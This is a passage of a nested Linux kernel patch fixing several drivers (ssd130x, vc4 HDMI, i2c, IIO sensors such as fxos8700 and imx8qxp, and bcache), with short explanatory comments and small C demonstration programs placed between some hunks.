+ static const struct drm_crtc_funcs ssd130x_crtc_funcs = {
+-	.reset = ssd130x_crtc_reset,
++	.reset = drm_atomic_helper_crtc_reset,
+ 	.destroy = drm_crtc_cleanup,
+ 	.set_config = drm_atomic_helper_set_config,
+ 	.page_flip = drm_atomic_helper_page_flip,
+@@ -695,6 +685,12 @@ static void ssd130x_encoder_helper_atomic_enable(struct drm_encoder *encoder,
+ 	if (ret)
+ 		return;
+ 
++	ret = ssd130x_init(ssd130x);
++	if (ret) {
++		ssd130x_power_off(ssd130x);
++		return;
++	}
++
+ 	ssd130x_write_cmd(ssd130x, 1, SSD130X_DISPLAY_ON);
+ 
+ 	backlight_enable(ssd130x->bl_dev);
+diff --git a/drivers/gpu/drm/vc4/vc4_hdmi.c b/drivers/gpu/drm/vc4/vc4_hdmi.c
+index 470432c8fd707..c4b73d9dd0409 100644
+--- a/drivers/gpu/drm/vc4/vc4_hdmi.c
++++ b/drivers/gpu/drm/vc4/vc4_hdmi.c
+@@ -3009,7 +3009,8 @@ static int vc4_hdmi_cec_init(struct vc4_hdmi *vc4_hdmi)
+ 	}
+ 
+ 	vc4_hdmi->cec_adap = cec_allocate_adapter(&vc4_hdmi_cec_adap_ops,
+-						  vc4_hdmi, "vc4",
++						  vc4_hdmi,
++						  vc4_hdmi->variant->card_name,
+ 						  CEC_CAP_DEFAULTS |
+ 						  CEC_CAP_CONNECTOR_INFO, 1);
+ 	ret = PTR_ERR_OR_ZERO(vc4_hdmi->cec_adap);
+diff --git a/drivers/hv/hv_balloon.c b/drivers/hv/hv_balloon.c
+index 6c127f061f06d..f98c849096f7b 100644
+--- a/drivers/hv/hv_balloon.c
++++ b/drivers/hv/hv_balloon.c
+@@ -1911,7 +1911,7 @@ static void  hv_balloon_debugfs_init(struct hv_dynmem_device *b)
+ 
+ static void  hv_balloon_debugfs_exit(struct hv_dynmem_device *b)
+ {
+-	debugfs_remove(debugfs_lookup("hv-balloon", NULL));
++	debugfs_lookup_and_remove("hv-balloon", NULL);
+ }
+ 
+ #else
+diff --git a/drivers/i2c/busses/i2c-designware-pcidrv.c b/drivers/i2c/busses/i2c-designware-pcidrv.c
+index e499f96506c52..782fe1ef3ca10 100644
+--- a/drivers/i2c/busses/i2c-designware-pcidrv.c
++++ b/drivers/i2c/busses/i2c-designware-pcidrv.c
+@@ -396,6 +396,8 @@ static const struct pci_device_id i2_designware_pci_ids[] = {
+ 	{ PCI_VDEVICE(ATI,  0x73a4), navi_amd },
+ 	{ PCI_VDEVICE(ATI,  0x73e4), navi_amd },
+ 	{ PCI_VDEVICE(ATI,  0x73c4), navi_amd },
++	{ PCI_VDEVICE(ATI,  0x7444), navi_amd },
++	{ PCI_VDEVICE(ATI,  0x7464), navi_amd },
+ 	{ 0,}
+ };
+ MODULE_DEVICE_TABLE(pci, i2_designware_pci_ids);
+diff --git a/drivers/i2c/busses/i2c-mxs.c b/drivers/i2c/busses/i2c-mxs.c
+index 5af5cffc444ef..d113bed795452 100644
+--- a/drivers/i2c/busses/i2c-mxs.c
++++ b/drivers/i2c/busses/i2c-mxs.c
+@@ -826,8 +826,8 @@ static int mxs_i2c_probe(struct platform_device *pdev)
+ 	/* Setup the DMA */
+ 	i2c->dmach = dma_request_chan(dev, "rx-tx");
+ 	if (IS_ERR(i2c->dmach)) {
+-		dev_err(dev, "Failed to request dma\n");
+-		return PTR_ERR(i2c->dmach);
++		return dev_err_probe(dev, PTR_ERR(i2c->dmach),
++				     "Failed to request dma\n");
+ 	}
+ 
+ 	platform_set_drvdata(pdev, i2c);
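dev_err_probe() both logs and returns the error and, crucially, stays quiet for -EPROBE_DEFER, so a DMA channel that is merely not ready yet does not flood the log on every retried probe. A userspace approximation, assuming only the documented behaviour of the helper:

/* Approximation of dev_err_probe(); the real one also records the
 * deferral reason for debugfs. */
#include <stdio.h>

#define EPROBE_DEFER 517	/* value borrowed from the kernel's errno.h */

static int dev_err_probe_like(int err, const char *msg)
{
	/* -EPROBE_DEFER is an expected, retryable condition: stay quiet
	 * instead of spamming the log on every probe attempt */
	if (err != -EPROBE_DEFER)
		fprintf(stderr, "probe error %d: %s\n", err, msg);
	return err;
}

int main(void)
{
	int ret = dev_err_probe_like(-EPROBE_DEFER, "Failed to request dma");

	printf("probe returned %d\n", ret);
	return 0;
}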
+diff --git a/drivers/i2c/busses/i2c-rk3x.c b/drivers/i2c/busses/i2c-rk3x.c
+index d1658ed76562b..b31cf4f18f854 100644
+--- a/drivers/i2c/busses/i2c-rk3x.c
++++ b/drivers/i2c/busses/i2c-rk3x.c
+@@ -80,7 +80,7 @@ enum {
+ #define DEFAULT_SCL_RATE  (100 * 1000) /* Hz */
+ 
+ /**
+- * struct i2c_spec_values:
++ * struct i2c_spec_values - I2C specification values for various modes
+  * @min_hold_start_ns: min hold time (repeated) START condition
+  * @min_low_ns: min LOW period of the SCL clock
+  * @min_high_ns: min HIGH period of the SCL clock
+@@ -136,7 +136,7 @@ static const struct i2c_spec_values fast_mode_plus_spec = {
+ };
+ 
+ /**
+- * struct rk3x_i2c_calced_timings:
++ * struct rk3x_i2c_calced_timings - calculated V1 timings
+  * @div_low: Divider output for low
+  * @div_high: Divider output for high
+  * @tuning: Used to adjust setup/hold data time,
+@@ -159,7 +159,7 @@ enum rk3x_i2c_state {
+ };
+ 
+ /**
+- * struct rk3x_i2c_soc_data:
++ * struct rk3x_i2c_soc_data - SOC-specific data
+  * @grf_offset: offset inside the grf regmap for setting the i2c type
+  * @calc_timings: Callback function for calculating i2c timing information
+  */
+@@ -239,7 +239,8 @@ static inline void rk3x_i2c_clean_ipd(struct rk3x_i2c *i2c)
+ }
+ 
+ /**
+- * Generate a START condition, which triggers a REG_INT_START interrupt.
++ * rk3x_i2c_start - Generate a START condition, which triggers a REG_INT_START interrupt.
++ * @i2c: target controller data
+  */
+ static void rk3x_i2c_start(struct rk3x_i2c *i2c)
+ {
+@@ -258,8 +259,8 @@ static void rk3x_i2c_start(struct rk3x_i2c *i2c)
+ }
+ 
+ /**
+- * Generate a STOP condition, which triggers a REG_INT_STOP interrupt.
+- *
++ * rk3x_i2c_stop - Generate a STOP condition, which triggers a REG_INT_STOP interrupt.
++ * @i2c: target controller data
+  * @error: Error code to return in rk3x_i2c_xfer
+  */
+ static void rk3x_i2c_stop(struct rk3x_i2c *i2c, int error)
+@@ -298,7 +299,8 @@ static void rk3x_i2c_stop(struct rk3x_i2c *i2c, int error)
+ }
+ 
+ /**
+- * Setup a read according to i2c->msg
++ * rk3x_i2c_prepare_read - Setup a read according to i2c->msg
++ * @i2c: target controller data
+  */
+ static void rk3x_i2c_prepare_read(struct rk3x_i2c *i2c)
+ {
+@@ -329,7 +331,8 @@ static void rk3x_i2c_prepare_read(struct rk3x_i2c *i2c)
+ }
+ 
+ /**
+- * Fill the transmit buffer with data from i2c->msg
++ * rk3x_i2c_fill_transmit_buf - Fill the transmit buffer with data from i2c->msg
++ * @i2c: target controller data
+  */
+ static void rk3x_i2c_fill_transmit_buf(struct rk3x_i2c *i2c)
+ {
+@@ -532,11 +535,10 @@ out:
+ }
+ 
+ /**
+- * Get timing values of I2C specification
+- *
++ * rk3x_i2c_get_spec - Get timing values of I2C specification
+  * @speed: Desired SCL frequency
+  *
+- * Returns: Matched i2c spec values.
++ * Return: Matched i2c_spec_values.
+  */
+ static const struct i2c_spec_values *rk3x_i2c_get_spec(unsigned int speed)
+ {
+@@ -549,13 +551,12 @@ static const struct i2c_spec_values *rk3x_i2c_get_spec(unsigned int speed)
+ }
+ 
+ /**
+- * Calculate divider values for desired SCL frequency
+- *
++ * rk3x_i2c_v0_calc_timings - Calculate divider values for desired SCL frequency
+  * @clk_rate: I2C input clock rate
+  * @t: Known I2C timing information
+  * @t_calc: Calculated rk3x private timings that would be written into regs
+  *
+- * Returns: 0 on success, -EINVAL if the goal SCL rate is too slow. In that case
++ * Return: %0 on success, -%EINVAL if the goal SCL rate is too slow. In that case
+  * a best-effort divider value is returned in divs. If the target rate is
+  * too high, we silently use the highest possible rate.
+  */
+@@ -710,13 +711,12 @@ static int rk3x_i2c_v0_calc_timings(unsigned long clk_rate,
+ }
+ 
+ /**
+- * Calculate timing values for desired SCL frequency
+- *
++ * rk3x_i2c_v1_calc_timings - Calculate timing values for desired SCL frequency
+  * @clk_rate: I2C input clock rate
+  * @t: Known I2C timing information
+  * @t_calc: Calculated rk3x private timings that would be written into regs
+  *
+- * Returns: 0 on success, -EINVAL if the goal SCL rate is too slow. In that case
++ * Return: %0 on success, -%EINVAL if the goal SCL rate is too slow. In that case
+  * a best-effort divider value is returned in divs. If the target rate is
+  * too high, we silently use the highest possible rate.
+  * The following formulas are v1's method to calculate timings.
+@@ -960,14 +960,14 @@ static int rk3x_i2c_clk_notifier_cb(struct notifier_block *nb, unsigned long
+ }
+ 
+ /**
+- * Setup I2C registers for an I2C operation specified by msgs, num.
+- *
+- * Must be called with i2c->lock held.
+- *
++ * rk3x_i2c_setup - Setup I2C registers for an I2C operation specified by msgs, num.
++ * @i2c: target controller data
+  * @msgs: I2C msgs to process
+  * @num: Number of msgs
+  *
+- * returns: Number of I2C msgs processed or negative in case of error
++ * Must be called with i2c->lock held.
++ *
++ * Return: Number of I2C msgs processed or negative in case of error
+  */
+ static int rk3x_i2c_setup(struct rk3x_i2c *i2c, struct i2c_msg *msgs, int num)
+ {
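All of the rk3x hunks above fix the same kernel-doc violation: a /** comment must open with "<symbol> - summary", parameter lines come next, constraints go in the body, and the return value is introduced by "Return:". A sketch of the expected shape on an invented function:

/* Invented example showing the kernel-doc layout the hunks restore. */

/**
 * rk3x_example_calc - compute an example divider
 * @clk_rate: input clock rate in Hz
 * @target: desired output rate in Hz
 *
 * Must be called with the bus lock held (notes like this belong in the
 * body, not between the parameter lines).
 *
 * Return: %0 on success, -%EINVAL if @target is zero.
 */
static int rk3x_example_calc(unsigned long clk_rate, unsigned long target)
{
	if (!target)
		return -22;	/* -EINVAL */
	return (int)(clk_rate / target) >= 0 ? 0 : -22;
}

int main(void) { return rk3x_example_calc(24000000, 100000); }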
+diff --git a/drivers/iio/accel/hid-sensor-accel-3d.c b/drivers/iio/accel/hid-sensor-accel-3d.c
+index a2def6f9380a3..5eac7ea199931 100644
+--- a/drivers/iio/accel/hid-sensor-accel-3d.c
++++ b/drivers/iio/accel/hid-sensor-accel-3d.c
+@@ -280,6 +280,7 @@ static int accel_3d_capture_sample(struct hid_sensor_hub_device *hsdev,
+ 			hid_sensor_convert_timestamp(
+ 					&accel_state->common_attributes,
+ 					*(int64_t *)raw_data);
++		ret = 0;
+ 	break;
+ 	default:
+ 		break;
+diff --git a/drivers/iio/adc/berlin2-adc.c b/drivers/iio/adc/berlin2-adc.c
+index 3d2e8b4db61ae..a4e7c7eff5acf 100644
+--- a/drivers/iio/adc/berlin2-adc.c
++++ b/drivers/iio/adc/berlin2-adc.c
+@@ -298,8 +298,10 @@ static int berlin2_adc_probe(struct platform_device *pdev)
+ 	int ret;
+ 
+ 	indio_dev = devm_iio_device_alloc(&pdev->dev, sizeof(*priv));
+-	if (!indio_dev)
++	if (!indio_dev) {
++		of_node_put(parent_np);
+ 		return -ENOMEM;
++	}
+ 
+ 	priv = iio_priv(indio_dev);
+ 
+diff --git a/drivers/iio/adc/imx8qxp-adc.c b/drivers/iio/adc/imx8qxp-adc.c
+index 36777b827165a..f5a0fc9e64c54 100644
+--- a/drivers/iio/adc/imx8qxp-adc.c
++++ b/drivers/iio/adc/imx8qxp-adc.c
+@@ -86,6 +86,8 @@
+ 
+ #define IMX8QXP_ADC_TIMEOUT		msecs_to_jiffies(100)
+ 
++#define IMX8QXP_ADC_MAX_FIFO_SIZE		16
++
+ struct imx8qxp_adc {
+ 	struct device *dev;
+ 	void __iomem *regs;
+@@ -95,6 +97,7 @@ struct imx8qxp_adc {
+ 	/* Serialise ADC channel reads */
+ 	struct mutex lock;
+ 	struct completion completion;
++	u32 fifo[IMX8QXP_ADC_MAX_FIFO_SIZE];
+ };
+ 
+ #define IMX8QXP_ADC_CHAN(_idx) {				\
+@@ -238,8 +241,7 @@ static int imx8qxp_adc_read_raw(struct iio_dev *indio_dev,
+ 			return ret;
+ 		}
+ 
+-		*val = FIELD_GET(IMX8QXP_ADC_RESFIFO_VAL_MASK,
+-				 readl(adc->regs + IMX8QXP_ADR_ADC_RESFIFO));
++		*val = adc->fifo[0];
+ 
+ 		mutex_unlock(&adc->lock);
+ 		return IIO_VAL_INT;
+@@ -265,10 +267,15 @@ static irqreturn_t imx8qxp_adc_isr(int irq, void *dev_id)
+ {
+ 	struct imx8qxp_adc *adc = dev_id;
+ 	u32 fifo_count;
++	int i;
+ 
+ 	fifo_count = FIELD_GET(IMX8QXP_ADC_FCTRL_FCOUNT_MASK,
+ 			       readl(adc->regs + IMX8QXP_ADR_ADC_FCTRL));
+ 
++	for (i = 0; i < fifo_count; i++)
++		adc->fifo[i] = FIELD_GET(IMX8QXP_ADC_RESFIFO_VAL_MASK,
++				readl_relaxed(adc->regs + IMX8QXP_ADR_ADC_RESFIFO));
++
+ 	if (fifo_count)
+ 		complete(&adc->completion);
+ 
+diff --git a/drivers/iio/adc/stm32-dfsdm-adc.c b/drivers/iio/adc/stm32-dfsdm-adc.c
+index 6d21ea84fa82d..a428bdb567d52 100644
+--- a/drivers/iio/adc/stm32-dfsdm-adc.c
++++ b/drivers/iio/adc/stm32-dfsdm-adc.c
+@@ -1520,6 +1520,7 @@ static const struct of_device_id stm32_dfsdm_adc_match[] = {
+ 	},
+ 	{}
+ };
++MODULE_DEVICE_TABLE(of, stm32_dfsdm_adc_match);
+ 
+ static int stm32_dfsdm_adc_probe(struct platform_device *pdev)
+ {
+diff --git a/drivers/iio/adc/twl6030-gpadc.c b/drivers/iio/adc/twl6030-gpadc.c
+index f53e8558b560c..32873fb5f3676 100644
+--- a/drivers/iio/adc/twl6030-gpadc.c
++++ b/drivers/iio/adc/twl6030-gpadc.c
+@@ -57,6 +57,18 @@
+ #define TWL6030_GPADCS				BIT(1)
+ #define TWL6030_GPADCR				BIT(0)
+ 
++#define USB_VBUS_CTRL_SET			0x04
++#define USB_ID_CTRL_SET				0x06
++
++#define TWL6030_MISC1				0xE4
++#define VBUS_MEAS				0x01
++#define ID_MEAS					0x01
++
++#define VAC_MEAS                0x04
++#define VBAT_MEAS               0x02
++#define BB_MEAS                 0x01
++
++
+ /**
+  * struct twl6030_chnl_calib - channel calibration
+  * @gain:		slope coefficient for ideal curve
+@@ -927,6 +939,26 @@ static int twl6030_gpadc_probe(struct platform_device *pdev)
+ 		return ret;
+ 	}
+ 
++	ret = twl_i2c_write_u8(TWL_MODULE_USB, VBUS_MEAS, USB_VBUS_CTRL_SET);
++	if (ret < 0) {
++		dev_err(dev, "failed to wire up inputs\n");
++		return ret;
++	}
++
++	ret = twl_i2c_write_u8(TWL_MODULE_USB, ID_MEAS, USB_ID_CTRL_SET);
++	if (ret < 0) {
++		dev_err(dev, "failed to wire up inputs\n");
++		return ret;
++	}
++
++	ret = twl_i2c_write_u8(TWL6030_MODULE_ID0,
++				VBAT_MEAS | BB_MEAS | VAC_MEAS,
++				TWL6030_MISC1);
++	if (ret < 0) {
++		dev_err(dev, "failed to wire up inputs\n");
++		return ret;
++	}
++
+ 	indio_dev->name = DRIVER_NAME;
+ 	indio_dev->info = &twl6030_gpadc_iio_info;
+ 	indio_dev->modes = INDIO_DIRECT_MODE;
+diff --git a/drivers/iio/adc/xilinx-ams.c b/drivers/iio/adc/xilinx-ams.c
+index 5b4bdf3a26bb8..a507d2e170792 100644
+--- a/drivers/iio/adc/xilinx-ams.c
++++ b/drivers/iio/adc/xilinx-ams.c
+@@ -1329,7 +1329,7 @@ static int ams_parse_firmware(struct iio_dev *indio_dev)
+ 
+ 	dev_channels = devm_krealloc(dev, ams_channels, dev_size, GFP_KERNEL);
+ 	if (!dev_channels)
+-		ret = -ENOMEM;
++		return -ENOMEM;
+ 
+ 	indio_dev->channels = dev_channels;
+ 	indio_dev->num_channels = num_channels;
+diff --git a/drivers/iio/gyro/hid-sensor-gyro-3d.c b/drivers/iio/gyro/hid-sensor-gyro-3d.c
+index 8f0ad022c7f1b..698c50da1f109 100644
+--- a/drivers/iio/gyro/hid-sensor-gyro-3d.c
++++ b/drivers/iio/gyro/hid-sensor-gyro-3d.c
+@@ -231,6 +231,7 @@ static int gyro_3d_capture_sample(struct hid_sensor_hub_device *hsdev,
+ 		gyro_state->timestamp =
+ 			hid_sensor_convert_timestamp(&gyro_state->common_attributes,
+ 						     *(s64 *)raw_data);
++		ret = 0;
+ 	break;
+ 	default:
+ 		break;
+diff --git a/drivers/iio/imu/fxos8700_core.c b/drivers/iio/imu/fxos8700_core.c
+index 423cfe526f2a1..6d189c4b9ff96 100644
+--- a/drivers/iio/imu/fxos8700_core.c
++++ b/drivers/iio/imu/fxos8700_core.c
+@@ -10,6 +10,7 @@
+ #include <linux/regmap.h>
+ #include <linux/acpi.h>
+ #include <linux/bitops.h>
++#include <linux/bitfield.h>
+ 
+ #include <linux/iio/iio.h>
+ #include <linux/iio/sysfs.h>
+@@ -144,9 +145,8 @@
+ #define FXOS8700_NVM_DATA_BNK0      0xa7
+ 
+ /* Bit definitions for FXOS8700_CTRL_REG1 */
+-#define FXOS8700_CTRL_ODR_MSK       0x38
+ #define FXOS8700_CTRL_ODR_MAX       0x00
+-#define FXOS8700_CTRL_ODR_MIN       GENMASK(4, 3)
++#define FXOS8700_CTRL_ODR_MSK       GENMASK(5, 3)
+ 
+ /* Bit definitions for FXOS8700_M_CTRL_REG1 */
+ #define FXOS8700_HMS_MASK           GENMASK(1, 0)
+@@ -320,7 +320,7 @@ static enum fxos8700_sensor fxos8700_to_sensor(enum iio_chan_type iio_type)
+ 	switch (iio_type) {
+ 	case IIO_ACCEL:
+ 		return FXOS8700_ACCEL;
+-	case IIO_ANGL_VEL:
++	case IIO_MAGN:
+ 		return FXOS8700_MAGN;
+ 	default:
+ 		return -EINVAL;
+@@ -345,15 +345,35 @@ static int fxos8700_set_active_mode(struct fxos8700_data *data,
+ static int fxos8700_set_scale(struct fxos8700_data *data,
+ 			      enum fxos8700_sensor t, int uscale)
+ {
+-	int i;
++	int i, ret, val;
++	bool active_mode;
+ 	static const int scale_num = ARRAY_SIZE(fxos8700_accel_scale);
+ 	struct device *dev = regmap_get_device(data->regmap);
+ 
+ 	if (t == FXOS8700_MAGN) {
+-		dev_err(dev, "Magnetometer scale is locked at 1200uT\n");
++		dev_err(dev, "Magnetometer scale is locked at 0.001Gs\n");
+ 		return -EINVAL;
+ 	}
+ 
++	/*
++	 * When the device is in active mode, it fails to set an ACCEL
++	 * full-scale range (2g/4g/8g) in FXOS8700_XYZ_DATA_CFG.
++	 * This does not align with the datasheet, but it is fxos8700
++	 * chip behavior. Set the device to standby mode before setting
++	 * an ACCEL full-scale range.
++	 */
++	ret = regmap_read(data->regmap, FXOS8700_CTRL_REG1, &val);
++	if (ret)
++		return ret;
++
++	active_mode = val & FXOS8700_ACTIVE;
++	if (active_mode) {
++		ret = regmap_write(data->regmap, FXOS8700_CTRL_REG1,
++				   val & ~FXOS8700_ACTIVE);
++		if (ret)
++			return ret;
++	}
++
+ 	for (i = 0; i < scale_num; i++)
+ 		if (fxos8700_accel_scale[i].uscale == uscale)
+ 			break;
+@@ -361,8 +381,12 @@ static int fxos8700_set_scale(struct fxos8700_data *data,
+ 	if (i == scale_num)
+ 		return -EINVAL;
+ 
+-	return regmap_write(data->regmap, FXOS8700_XYZ_DATA_CFG,
++	ret = regmap_write(data->regmap, FXOS8700_XYZ_DATA_CFG,
+ 			    fxos8700_accel_scale[i].bits);
++	if (ret)
++		return ret;
++	return regmap_write(data->regmap, FXOS8700_CTRL_REG1,
++				  active_mode);
+ }
+ 
+ static int fxos8700_get_scale(struct fxos8700_data *data,
+@@ -372,7 +396,7 @@ static int fxos8700_get_scale(struct fxos8700_data *data,
+ 	static const int scale_num = ARRAY_SIZE(fxos8700_accel_scale);
+ 
+ 	if (t == FXOS8700_MAGN) {
+-		*uscale = 1200; /* Magnetometer is locked at 1200uT */
++		*uscale = 1000; /* Magnetometer is locked at 0.001Gs */
+ 		return 0;
+ 	}
+ 
+@@ -394,22 +418,61 @@ static int fxos8700_get_data(struct fxos8700_data *data, int chan_type,
+ 			     int axis, int *val)
+ {
+ 	u8 base, reg;
++	s16 tmp;
+ 	int ret;
+-	enum fxos8700_sensor type = fxos8700_to_sensor(chan_type);
+ 
+-	base = type ? FXOS8700_OUT_X_MSB : FXOS8700_M_OUT_X_MSB;
++	/*
++	 * The register base address varies with the channel type.
++	 * This bug wasn't noticed before because the enum-based lookup
++	 * was hard to read. Use a switch statement instead.
++	 */
++	switch (chan_type) {
++	case IIO_ACCEL:
++		base = FXOS8700_OUT_X_MSB;
++		break;
++	case IIO_MAGN:
++		base = FXOS8700_M_OUT_X_MSB;
++		break;
++	default:
++		return -EINVAL;
++	}
+ 
+ 	/* Block read 6 bytes of device output registers to avoid data loss */
+ 	ret = regmap_bulk_read(data->regmap, base, data->buf,
+-			       FXOS8700_DATA_BUF_SIZE);
++			       sizeof(data->buf));
+ 	if (ret)
+ 		return ret;
+ 
+ 	/* Convert axis to buffer index */
+ 	reg = axis - IIO_MOD_X;
+ 
++	/*
++	 * Convert to native endianness. The accel data and magn data
++	 * are signed, so a forced type conversion is needed.
++	 */
++	tmp = be16_to_cpu(data->buf[reg]);
++
++	/*
++	 * ACCEL output data registers contain the X-axis, Y-axis, and Z-axis
++	 * 14-bit left-justified sample data and MAGN output data registers
++	 * contain the X-axis, Y-axis, and Z-axis 16-bit sample data. Apply
++	 * a signed 2-bit right shift to the raw data read back from the
++	 * ACCEL output data registers and keep the MAGN data as-is.
++	 * The value is then sign-extended to 32 bits.
++	 */
++	switch (chan_type) {
++	case IIO_ACCEL:
++		tmp = tmp >> 2;
++		break;
++	case IIO_MAGN:
++		/* Nothing to do */
++		break;
++	default:
++		return -EINVAL;
++	}
++
+ 	/* Convert to native endianness */
+-	*val = sign_extend32(be16_to_cpu(data->buf[reg]), 15);
++	*val = sign_extend32(tmp, 15);
+ 
+ 	return 0;
+ }
+@@ -445,10 +508,9 @@ static int fxos8700_set_odr(struct fxos8700_data *data, enum fxos8700_sensor t,
+ 	if (i >= odr_num)
+ 		return -EINVAL;
+ 
+-	return regmap_update_bits(data->regmap,
+-				  FXOS8700_CTRL_REG1,
+-				  FXOS8700_CTRL_ODR_MSK + FXOS8700_ACTIVE,
+-				  fxos8700_odr[i].bits << 3 | active_mode);
++	val &= ~FXOS8700_CTRL_ODR_MSK;
++	val |= FIELD_PREP(FXOS8700_CTRL_ODR_MSK, fxos8700_odr[i].bits) | FXOS8700_ACTIVE;
++	return regmap_write(data->regmap, FXOS8700_CTRL_REG1, val);
+ }
+ 
+ static int fxos8700_get_odr(struct fxos8700_data *data, enum fxos8700_sensor t,
+@@ -461,7 +523,7 @@ static int fxos8700_get_odr(struct fxos8700_data *data, enum fxos8700_sensor t,
+ 	if (ret)
+ 		return ret;
+ 
+-	val &= FXOS8700_CTRL_ODR_MSK;
++	val = FIELD_GET(FXOS8700_CTRL_ODR_MSK, val);
+ 
+ 	for (i = 0; i < odr_num; i++)
+ 		if (val == fxos8700_odr[i].bits)
+@@ -526,7 +588,7 @@ static IIO_CONST_ATTR(in_accel_sampling_frequency_available,
+ static IIO_CONST_ATTR(in_magn_sampling_frequency_available,
+ 		      "1.5625 6.25 12.5 50 100 200 400 800");
+ static IIO_CONST_ATTR(in_accel_scale_available, "0.000244 0.000488 0.000976");
+-static IIO_CONST_ATTR(in_magn_scale_available, "0.000001200");
++static IIO_CONST_ATTR(in_magn_scale_available, "0.001000");
+ 
+ static struct attribute *fxos8700_attrs[] = {
+ 	&iio_const_attr_in_accel_sampling_frequency_available.dev_attr.attr,
+@@ -592,14 +654,19 @@ static int fxos8700_chip_init(struct fxos8700_data *data, bool use_spi)
+ 	if (ret)
+ 		return ret;
+ 
+-	/* Max ODR (800Hz individual or 400Hz hybrid), active mode */
+-	ret = regmap_write(data->regmap, FXOS8700_CTRL_REG1,
+-			   FXOS8700_CTRL_ODR_MAX | FXOS8700_ACTIVE);
++	/*
++	 * Set max full-scale range (+/-8G) for ACCEL sensor in chip
++	 * initialization then activate the device.
++	 */
++	ret = regmap_write(data->regmap, FXOS8700_XYZ_DATA_CFG, MODE_8G);
+ 	if (ret)
+ 		return ret;
+ 
+-	/* Set for max full-scale range (+/-8G) */
+-	return regmap_write(data->regmap, FXOS8700_XYZ_DATA_CFG, MODE_8G);
++	/* Max ODR (800Hz individual or 400Hz hybrid), active mode */
++	return regmap_update_bits(data->regmap, FXOS8700_CTRL_REG1,
++				FXOS8700_CTRL_ODR_MSK | FXOS8700_ACTIVE,
++				FIELD_PREP(FXOS8700_CTRL_ODR_MSK, FXOS8700_CTRL_ODR_MAX) |
++				FXOS8700_ACTIVE);
+ }
+ 
+ static void fxos8700_chip_uninit(void *data)
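The data-path part of the fxos8700 rework hinges on the accelerometer samples being 14-bit, left-justified and big-endian: byte-swap first, arithmetic-shift the two pad bits away, then sign-extend. A standalone check of that conversion with a made-up sample:

/* Verifies the 14-bit left-justified sample handling on a toy value. */
#include <stdint.h>
#include <stdio.h>

static int32_t sign_extend32(uint32_t value, int index)
{
	uint8_t shift = 31 - index;

	return (int32_t)(value << shift) >> shift;
}

int main(void)
{
	/* -2 counts, stored big-endian, left-justified in 16 bits */
	uint8_t raw[2] = { 0xff, 0xf8 };
	int16_t tmp = (int16_t)((raw[0] << 8) | raw[1]);	/* be16_to_cpu */

	/* arithmetic shift keeps the sign, as the driver relies on */
	tmp >>= 2;
	printf("accel sample = %d\n", sign_extend32((uint16_t)tmp, 15));
	return 0;
}

Magnetometer samples are already full 16-bit values, which is why the switch in the hunk shifts only the IIO_ACCEL case.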
+diff --git a/drivers/iio/light/cm32181.c b/drivers/iio/light/cm32181.c
+index 001055d097509..b1674a5bfa368 100644
+--- a/drivers/iio/light/cm32181.c
++++ b/drivers/iio/light/cm32181.c
+@@ -440,6 +440,8 @@ static int cm32181_probe(struct i2c_client *client)
+ 	if (!indio_dev)
+ 		return -ENOMEM;
+ 
++	i2c_set_clientdata(client, indio_dev);
++
+ 	/*
+ 	 * Some ACPI systems list 2 I2C resources for the CM3218 sensor, the
+ 	 * SMBus Alert Response Address (ARA, 0x0c) and the actual I2C address.
+@@ -460,8 +462,6 @@ static int cm32181_probe(struct i2c_client *client)
+ 			return PTR_ERR(client);
+ 	}
+ 
+-	i2c_set_clientdata(client, indio_dev);
+-
+ 	cm32181 = iio_priv(indio_dev);
+ 	cm32181->client = client;
+ 	cm32181->dev = dev;
+@@ -490,7 +490,8 @@ static int cm32181_probe(struct i2c_client *client)
+ 
+ static int cm32181_suspend(struct device *dev)
+ {
+-	struct i2c_client *client = to_i2c_client(dev);
++	struct cm32181_chip *cm32181 = iio_priv(dev_get_drvdata(dev));
++	struct i2c_client *client = cm32181->client;
+ 
+ 	return i2c_smbus_write_word_data(client, CM32181_REG_ADDR_CMD,
+ 					 CM32181_CMD_ALS_DISABLE);
+@@ -498,8 +499,8 @@ static int cm32181_suspend(struct device *dev)
+ 
+ static int cm32181_resume(struct device *dev)
+ {
+-	struct i2c_client *client = to_i2c_client(dev);
+ 	struct cm32181_chip *cm32181 = iio_priv(dev_get_drvdata(dev));
++	struct i2c_client *client = cm32181->client;
+ 
+ 	return i2c_smbus_write_word_data(client, CM32181_REG_ADDR_CMD,
+ 					 cm32181->conf_regs[CM32181_REG_ADDR_CMD]);
+diff --git a/drivers/infiniband/ulp/rtrs/rtrs-clt.c b/drivers/infiniband/ulp/rtrs/rtrs-clt.c
+index 8546b8816524c..730f2f1e09bbd 100644
+--- a/drivers/infiniband/ulp/rtrs/rtrs-clt.c
++++ b/drivers/infiniband/ulp/rtrs/rtrs-clt.c
+@@ -966,7 +966,7 @@ static void rtrs_clt_init_req(struct rtrs_clt_io_req *req,
+ 	refcount_set(&req->ref, 1);
+ 	req->mp_policy = clt_path->clt->mp_policy;
+ 
+-	iov_iter_kvec(&iter, READ, vec, 1, usr_len);
++	iov_iter_kvec(&iter, ITER_SOURCE, vec, 1, usr_len);
+ 	len = _copy_from_iter(req->iu->buf, usr_len, &iter);
+ 	WARN_ON(len != usr_len);
+ 
+diff --git a/drivers/isdn/mISDN/l1oip_core.c b/drivers/isdn/mISDN/l1oip_core.c
+index a77195e378b7b..c24771336f611 100644
+--- a/drivers/isdn/mISDN/l1oip_core.c
++++ b/drivers/isdn/mISDN/l1oip_core.c
+@@ -706,7 +706,7 @@ l1oip_socket_thread(void *data)
+ 		printk(KERN_DEBUG "%s: socket created and open\n",
+ 		       __func__);
+ 	while (!signal_pending(current)) {
+-		iov_iter_kvec(&msg.msg_iter, READ, &iov, 1, recvbuf_size);
++		iov_iter_kvec(&msg.msg_iter, ITER_DEST, &iov, 1, recvbuf_size);
+ 		recvlen = sock_recvmsg(socket, &msg, 0);
+ 		if (recvlen > 0) {
+ 			l1oip_socket_parse(hc, &sin_rx, recvbuf, recvlen);
+diff --git a/drivers/md/bcache/bcache_ondisk.h b/drivers/md/bcache/bcache_ondisk.h
+index 97413586195b4..f96034e0ba4f2 100644
+--- a/drivers/md/bcache/bcache_ondisk.h
++++ b/drivers/md/bcache/bcache_ondisk.h
+@@ -106,7 +106,8 @@ static inline unsigned long bkey_bytes(const struct bkey *k)
+ 	return bkey_u64s(k) * sizeof(__u64);
+ }
+ 
+-#define bkey_copy(_dest, _src)	memcpy(_dest, _src, bkey_bytes(_src))
++#define bkey_copy(_dest, _src)	unsafe_memcpy(_dest, _src, bkey_bytes(_src), \
++					/* bkey is always padded */)
+ 
